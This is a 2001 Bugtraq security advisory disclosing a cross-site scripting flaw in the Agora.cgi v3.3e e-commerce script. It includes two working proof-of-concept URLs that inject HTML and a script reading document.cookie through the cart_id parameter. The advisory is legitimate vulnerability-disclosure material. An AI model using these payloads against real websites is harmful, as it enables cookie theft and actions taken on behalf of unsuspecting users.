[23535] in bugtraq
Agoracgi v3.3e Cross Site Scripting Vulnerability
daemon@ATHENA.MIT.EDU (Tamer Sahin)
Mon Dec 17 18:32:14 2001
Message-ID: <068b01c1874a$7b1296b0$cb9c2bd5@ts>
Reply-To: "Tamer Sahin" <ts@securityoffice.net>
From: "Tamer Sahin" <ts@securityoffice.net>
To: <bugtraq@securityfocus.com>
Date: Tue, 18 Dec 2001 00:30:49 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Agoracgi v3.3e Cross Site Scripting Vulnerability
Type:
Cross Site Scripting
Release Date:
December 18, 2001
Product / Vendor:
Agora.cgi is an open source ecommerce solution. Steve Kneizys is the
principle author of this project. The project grew from a couple of
other open source projects.
http://www.agoracgi.com
Summary:
Cross Site Scripting, most dynamic websites are still not filtering
user input. This lets remote sites access towrite scripts on
vulnerable sites & application, stealing cookies, performing actions
on behalf of user or modifying look of content on site.
http://www.agoracgi.com/store/agora.cgi?cart_id=<IMG%20height=47%20src
="http://www.securityoffice.net/images/title.gif"%20width=406%20border
=0>&xm=on&product=HTML
http://www.agoracgi.com/store/agora.cgi?cart_id=<script>alert(document
.cookie)</script>&xm=on&product=HTML
Tested:
Agoracgi v3.3e
Vulnerable:
Agoracgi v3.3e (And may be other)
Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.
Author:
Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net
Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0 Fingerprint:
B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBPB5V+buLpFMrXtywEQInVgCfSWnIa3wUDvwSoDwU7wYkhUG85MgAoI85
L9mB+t3g5i0Ea+Rn8o31y4Fx
=RdM5
-----END PGP SIGNATURE-----